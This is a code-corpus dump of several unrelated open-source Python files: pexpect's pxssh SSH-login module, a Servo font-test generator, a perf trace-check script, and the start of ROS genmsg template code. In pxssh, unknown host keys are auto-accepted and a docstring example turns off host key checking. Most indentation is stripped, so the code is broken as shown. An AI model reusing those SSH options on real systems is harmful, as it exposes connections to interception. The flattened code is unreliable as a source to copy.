WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
from pexpect import ExceptionPexpect, TIMEOUT, EOF, spawn
import time
import os
__all__ = ['ExceptionPxssh', 'pxssh']
# Exception classes used by this module.
class ExceptionPxssh(ExceptionPexpect):
'''Raised for pxssh exceptions.
'''
class pxssh (spawn):
'''This class extends pexpect.spawn to specialize setting up SSH
connections. This adds methods for login, logout, and expecting the shell
prompt. It does various tricky things to handle many situations in the SSH
login process. For example, if the session is your first login, then pxssh
automatically accepts the remote certificate; or if you have public key
authentication setup then pxssh won't wait for the password prompt.
pxssh uses the shell prompt to synchronize output from the remote host. In
order to make this more robust it sets the shell prompt to something more
    unique than just $ or #. This should work on most Bourne/Bash or Csh style
shells.
Example that runs a few commands on a remote server and prints the result::
import pxssh
import getpass
try:
s = pxssh.pxssh()
hostname = raw_input('hostname: ')
username = raw_input('username: ')
password = getpass.getpass('password: ')
s.login(hostname, username, password)
s.sendline('uptime') # run a command
s.prompt() # match the prompt
print(s.before) # print everything before the prompt.
s.sendline('ls -l')
s.prompt()
print(s.before)
s.sendline('df')
s.prompt()
print(s.before)
s.logout()
except pxssh.ExceptionPxssh as e:
print("pxssh failed on login.")
print(e)
Example showing how to specify SSH options::
import pxssh
s = pxssh.pxssh(options={
"StrictHostKeyChecking": "no",
"UserKnownHostsFile": "/dev/null"})
...
Note that if you have ssh-agent running while doing development with pxssh
then this can lead to a lot of confusion. Many X display managers (xdm,
gdm, kdm, etc.) will automatically start a GUI agent. You may see a GUI
dialog box popup asking for a password during development. You should turn
off any key agents during testing. The 'force_password' attribute will turn
off public key authentication. This will only work if the remote SSH server
is configured to allow password logins. Example of using 'force_password'
attribute::
s = pxssh.pxssh()
s.force_password = True
hostname = raw_input('hostname: ')
username = raw_input('username: ')
password = getpass.getpass('password: ')
s.login (hostname, username, password)
'''
def __init__ (self, timeout=30, maxread=2000, searchwindowsize=None,
logfile=None, cwd=None, env=None, ignore_sighup=True, echo=True,
options={}, encoding=None, codec_errors='strict'):
spawn.__init__(self, None, timeout=timeout, maxread=maxread,
searchwindowsize=searchwindowsize, logfile=logfile,
cwd=cwd, env=env, ignore_sighup=ignore_sighup, echo=echo,
encoding=encoding, codec_errors=codec_errors)
self.name = '<pxssh>'
#SUBTLE HACK ALERT! Note that the command that SETS the prompt uses a
#slightly different string than the regular expression to match it. This
#is because when you set the prompt the command will echo back, but we
#don't want to match the echoed command. So if we make the set command
#slightly different than the regex we eliminate the problem. To make the
#set command different we add a backslash in front of $. The $ doesn't
#need to be escaped, but it doesn't hurt and serves to make the set
#prompt command different than the regex.
# used to match the command-line prompt
self.UNIQUE_PROMPT = "\[PEXPECT\][\$\#] "
self.PROMPT = self.UNIQUE_PROMPT
# used to set shell command-line prompt to UNIQUE_PROMPT.
self.PROMPT_SET_SH = "PS1='[PEXPECT]\$ '"
self.PROMPT_SET_CSH = "set prompt='[PEXPECT]\$ '"
self.SSH_OPTS = ("-o'RSAAuthentication=no'"
+ " -o 'PubkeyAuthentication=no'")
# Disabling host key checking, makes you vulnerable to MITM attacks.
# + " -o 'StrictHostKeyChecking=no'"
# + " -o 'UserKnownHostsFile /dev/null' ")
# Disabling X11 forwarding gets rid of the annoying SSH_ASKPASS from
# displaying a GUI password dialog. I have not figured out how to
# disable only SSH_ASKPASS without also disabling X11 forwarding.
# Unsetting SSH_ASKPASS on the remote side doesn't disable it! Annoying!
#self.SSH_OPTS = "-x -o'RSAAuthentication=no' -o 'PubkeyAuthentication=no'"
self.force_password = False
        # User-defined SSH options, e.g.
        # ssh.options = dict(StrictHostKeyChecking="no", UserKnownHostsFile="/dev/null")
self.options = options
def levenshtein_distance(self, a, b):
'''This calculates the Levenshtein distance between a and b.
'''
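        # Worked example: levenshtein_distance('kitten', 'sitting') == 3
        # (substitute 'k'->'s', substitute 'e'->'i', append 'g').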
n, m = len(a), len(b)
if n > m:
a,b = b,a
n,m = m,n
current = range(n+1)
for i in range(1,m+1):
previous, current = current, [i]+[0]*n
for j in range(1,n+1):
add, delete = previous[j]+1, current[j-1]+1
change = previous[j-1]
if a[j-1] != b[i-1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
def try_read_prompt(self, timeout_multiplier):
'''This facilitates using communication timeouts to perform
synchronization as quickly as possible, while supporting high latency
connections with a tunable worst case performance. Fast connections
should be read almost immediately. Worst case performance for this
method is timeout_multiplier * 3 seconds.
'''
# maximum time allowed to read the first response
first_char_timeout = timeout_multiplier * 0.5
# maximum time allowed between subsequent characters
inter_char_timeout = timeout_multiplier * 0.1
# maximum time for reading the entire prompt
total_timeout = timeout_multiplier * 3.0
prompt = self.string_type()
begin = time.time()
expired = 0.0
timeout = first_char_timeout
while expired < total_timeout:
try:
prompt += self.read_nonblocking(size=1, timeout=timeout)
                expired = time.time() - begin # update total time expired
timeout = inter_char_timeout
except TIMEOUT:
break
return prompt
def sync_original_prompt (self, sync_multiplier=1.0):
'''This attempts to find the prompt. Basically, press enter and record
the response; press enter again and record the response; if the two
responses are similar then assume we are at the original prompt.
This can be a slow function. Worst case with the default sync_multiplier
can take 12 seconds. Low latency connections are more likely to fail
with a low sync_multiplier. Best case sync time gets worse with a
high sync multiplier (500 ms with default). '''
# All of these timing pace values are magic.
# I came up with these based on what seemed reliable for
# connecting to a heavily loaded machine I have.
self.sendline()
time.sleep(0.1)
try:
# Clear the buffer before getting the prompt.
self.try_read_prompt(sync_multiplier)
except TIMEOUT:
pass
self.sendline()
x = self.try_read_prompt(sync_multiplier)
self.sendline()
a = self.try_read_prompt(sync_multiplier)
self.sendline()
b = self.try_read_prompt(sync_multiplier)
ld = self.levenshtein_distance(a,b)
len_a = len(a)
if len_a == 0:
return False
if float(ld)/len_a < 0.4:
return True
return False
### TODO: This is getting messy and I'm pretty sure this isn't perfect.
### TODO: I need to draw a flow chart for this.
def login (self, server, username, password='', terminal_type='ansi',
original_prompt=r"[#$]", login_timeout=10, port=None,
auto_prompt_reset=True, ssh_key=None, quiet=True,
sync_multiplier=1, check_local_ip=True):
'''This logs the user into the given server.
It uses
'original_prompt' to try to find the prompt right after login. When it
finds the prompt it immediately tries to reset the prompt to something
more easily matched. The default 'original_prompt' is very optimistic
and is easily fooled. It's more reliable to try to match the original
prompt as exactly as possible to prevent false matches by server
strings such as the "Message Of The Day". On many systems you can
disable the MOTD on the remote server by creating a zero-length file
called :file:`~/.hushlogin` on the remote server. If a prompt cannot be found
then this will not necessarily cause the login to fail. In the case of
a timeout when looking for the prompt we assume that the original
prompt was so weird that we could not match it, so we use a few tricks
to guess when we have reached the prompt. Then we hope for the best and
blindly try to reset the prompt to something more unique. If that fails
then login() raises an :class:`ExceptionPxssh` exception.
In some situations it is not possible or desirable to reset the
original prompt. In this case, pass ``auto_prompt_reset=False`` to
inhibit setting the prompt to the UNIQUE_PROMPT. Remember that pxssh
uses a unique prompt in the :meth:`prompt` method. If the original prompt is
not reset then this will disable the :meth:`prompt` method unless you
manually set the :attr:`PROMPT` attribute.
'''
ssh_options = ''.join([" -o '%s=%s'" % (o, v) for (o, v) in self.options.items()])
if quiet:
ssh_options = ssh_options + ' -q'
if not check_local_ip:
ssh_options = ssh_options + " -o'NoHostAuthenticationForLocalhost=yes'"
if self.force_password:
ssh_options = ssh_options + ' ' + self.SSH_OPTS
if port is not None:
ssh_options = ssh_options + ' -p %s'%(str(port))
if ssh_key is not None:
            # os.path.isfile() returns False rather than raising when the key
            # file is missing, so test the return value directly.
            if not os.path.isfile(ssh_key):
                raise ExceptionPxssh('private ssh key does not exist')
ssh_options = ssh_options + ' -i %s' % (ssh_key)
cmd = "ssh %s -l %s %s" % (ssh_options, username, server)
# This does not distinguish between a remote server 'password' prompt
# and a local ssh 'passphrase' prompt (for unlocking a private key).
spawn._spawn(self, cmd)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT, "(?i)connection closed by remote host"], timeout=login_timeout)
# First phase
if i==0:
# New certificate -- always accept it.
# This is what you get if SSH does not have the remote host's
# public key stored in the 'known_hosts' cache.
self.sendline("yes")
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
if i==2: # password or passphrase
self.sendline(password)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
if i==4:
self.sendline(terminal_type)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
# Second phase
if i==0:
# This is weird. This should not happen twice in a row.
self.close()
raise ExceptionPxssh('Weird error. Got "are you sure" prompt twice.')
elif i==1: # can occur if you have a public key pair set to authenticate.
### TODO: May NOT be OK if expect() got tricked and matched a false prompt.
pass
elif i==2: # password prompt again
# For incorrect passwords, some ssh servers will
# ask for the password again, others return 'denied' right away.
# If we get the password prompt again then this means
# we didn't get the password right the first time.
self.close()
raise ExceptionPxssh('password refused')
elif i==3: # permission denied -- password was bad.
self.close()
raise ExceptionPxssh('permission denied')
elif i==4: # terminal type again? WTF?
self.close()
raise ExceptionPxssh('Weird error. Got "terminal type" prompt twice.')
elif i==5: # Timeout
#This is tricky... I presume that we are at the command-line prompt.
#It may be that the shell prompt was so weird that we couldn't match
#it. Or it may be that we couldn't log in for some other reason. I
#can't be sure, but it's safe to guess that we did login because if
#I presume wrong and we are not logged in then this should be caught
#later when I try to set the shell prompt.
pass
elif i==6: # Connection closed by remote host
self.close()
raise ExceptionPxssh('connection closed')
else: # Unexpected
self.close()
raise ExceptionPxssh('unexpected login response')
if not self.sync_original_prompt(sync_multiplier):
self.close()
raise ExceptionPxssh('could not synchronize with original prompt')
# We appear to be in.
# set shell prompt to something unique.
if auto_prompt_reset:
if not self.set_unique_prompt():
self.close()
raise ExceptionPxssh('could not set shell prompt '
'(received: %r, expected: %r).' % (
self.before, self.PROMPT,))
return True
def logout (self):
'''Sends exit to the remote shell.
If there are stopped jobs then this automatically sends exit twice.
'''
self.sendline("exit")
index = self.expect([EOF, "(?i)there are stopped jobs"])
if index==1:
self.sendline("exit")
self.expect(EOF)
self.close()
def prompt(self, timeout=-1):
'''Match the next shell prompt.
This is little more than a short-cut to the :meth:`~pexpect.spawn.expect`
method. Note that if you called :meth:`login` with
``auto_prompt_reset=False``, then before calling :meth:`prompt` you must
set the :attr:`PROMPT` attribute to a regex that it will use for
matching the prompt.
Calling :meth:`prompt` will erase the contents of the :attr:`before`
attribute even if no prompt is ever matched. If timeout is not given or
it is set to -1 then self.timeout is used.
:return: True if the shell prompt was matched, False if the timeout was
reached.
'''
if timeout == -1:
timeout = self.timeout
i = self.expect([self.PROMPT, TIMEOUT], timeout=timeout)
if i==1:
return False
return True
def set_unique_prompt(self):
'''This sets the remote prompt to something more unique than ``#`` or ``$``.
This makes it easier for the :meth:`prompt` method to match the shell prompt
unambiguously. This method is called automatically by the :meth:`login`
method, but you may want to call it manually if you somehow reset the
shell prompt. For example, if you 'su' to a different user then you
will need to manually reset the prompt. This sends shell commands to
the remote host to set the prompt, so this assumes the remote host is
ready to receive commands.
Alternatively, you may use your own prompt pattern. In this case you
should call :meth:`login` with ``auto_prompt_reset=False``; then set the
:attr:`PROMPT` attribute to a regular expression. After that, the
:meth:`prompt` method will try to match your prompt pattern.
'''
self.sendline("unset PROMPT_COMMAND")
self.sendline(self.PROMPT_SET_SH) # sh-style
i = self.expect ([TIMEOUT, self.PROMPT], timeout=10)
if i == 0: # csh-style
self.sendline(self.PROMPT_SET_CSH)
i = self.expect([TIMEOUT, self.PROMPT], timeout=10)
if i == 0:
return False
return True
# vi:ts=4:sw=4:expandtab:ft=python:
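# A minimal, hedged usage sketch of the login()/prompt()/logout() flow documented
# above; the host name, user name, password, and command are placeholders, and the
# demo only runs when this file is executed directly.
if __name__ == '__main__':
    s = pxssh()
    s.login('example.com', 'someuser', 'somepassword')
    s.sendline('uptime')   # run a command on the remote host
    s.prompt()             # match the unique prompt set by login()
    print(s.before)        # output produced before the prompt
    s.logout()
    # If the original prompt must be kept, call login(..., auto_prompt_reset=False)
    # and assign a suitable regular expression to s.PROMPT before using s.prompt().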
|
gpl-3.0
|
huonw/servo
|
tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py
|
820
|
14309
|
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# parse
values = line.split("\t")
tag = values.pop(0)
mapping.append(tag);
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
charStringsIndex.append(charString)
glyphID = len(topDict.charset)
charStrings.charStrings[glyphName] = glyphID
topDict.charset.append(glyphName)
def makeLookup1():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
# bump this up so that the sequence is the same as the lookup 3 font
cp += 3
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 1
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = SingleSubst()
subtable.Format = 2
subtable.LookupType = 1
subtable.mapping = {
"%s.pass" % tag : "%s.fail" % tag,
"%s.fail" % tag : "%s.pass" % tag,
}
lookup.SubTable.append(subtable)
path = outputPath % 1 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeLookup3():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
# tag.default
glyphName = "%s.default" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.alt1,2,3
for i in range(1,4):
glyphName = "%s.alt%d" % (tag, i)
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 3
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = AlternateSubst()
subtable.Format = 1
subtable.LookupType = 3
subtable.alternates = {
"%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
"%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
}
lookup.SubTable.append(subtable)
path = outputPath % 3 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeJavascriptData():
features = sorted(mapping)
outStr = []
outStr.append("")
outStr.append("/* This file is autogenerated by makegsubfonts.py */")
outStr.append("")
outStr.append("/* ")
outStr.append(" Features defined in gsubtest fonts with associated base")
outStr.append(" codepoints for each feature:")
outStr.append("")
outStr.append(" cp = codepoint for feature featX")
outStr.append("")
outStr.append(" cp default PASS")
outStr.append(" cp featX=1 FAIL")
outStr.append(" cp featX=2 FAIL")
outStr.append("")
outStr.append(" cp+1 default FAIL")
outStr.append(" cp+1 featX=1 PASS")
outStr.append(" cp+1 featX=2 FAIL")
outStr.append("")
outStr.append(" cp+2 default FAIL")
outStr.append(" cp+2 featX=1 FAIL")
outStr.append(" cp+2 featX=2 PASS")
outStr.append("")
outStr.append("*/")
outStr.append("")
outStr.append("var gFeatures = {");
cp = baseCodepoint
taglist = []
for tag in features:
taglist.append("\"%s\": 0x%x" % (tag, cp))
cp += 4
outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
outStr.append("};");
outStr.append("");
if os.path.exists(javascriptData):
os.remove(javascriptData)
f = open(javascriptData, "wb")
f.write("\n".join(outStr))
f.close()
# build fonts
print "Making lookup type 1 font..."
makeLookup1()
print "Making lookup type 3 font..."
makeLookup3()
# output javascript data
print "Making javascript data file..."
makeJavascriptData()
|
mpl-2.0
|
Zkin/pf-kernel-updates
|
tools/perf/scripts/python/check-perf-trace.py
|
1997
|
2539
|
# perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
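#
# A typical way to exercise these handlers (assuming a perf.data file has been
# recorded first) is:
#
#   perf record -a -- sleep 1
#   perf script -s check-perf-trace.py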
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
|
gpl-2.0
|
APM602/APM602
|
mk/PX4/Tools/genmsg/src/genmsg/template_tools.py
|
215
|
9443
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
## ROS Message generation
##
##
import sys
import os
import em
import genmsg.command_line
import genmsg.msgs
import genmsg.msg_loader
import genmsg.gentools
# generate msg or srv files from a template file
# template_map is of the form {'template_file': 'output_file'}; output_file may contain @NAME@, which will be replaced by the message/service name
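# For example (the template file name below is purely illustrative):
#   msg_template_dict = {'msg.h.template': '@NAME@.h'}
# renders msg.h.template once per message, writing Foo.h for a message named Foo.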
def _generate_from_spec(input_file, output_dir, template_dir, msg_context, spec, template_map, search_path):
md5sum = genmsg.gentools.compute_md5(msg_context, spec)
# precompute msg definition once
if isinstance(spec, genmsg.msgs.MsgSpec):
msg_definition = genmsg.gentools.compute_full_text(msg_context, spec)
# Loop over all files to generate
for template_file_name, output_file_name in template_map.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name.replace("@NAME@", spec.short_name))
#print "generate_from_template %s %s %s" % (input_file, template_file, output_file)
ofile = open(output_file, 'w') #todo try
# Set dictionary for the generator interpreter
g = {
"file_name_in": input_file,
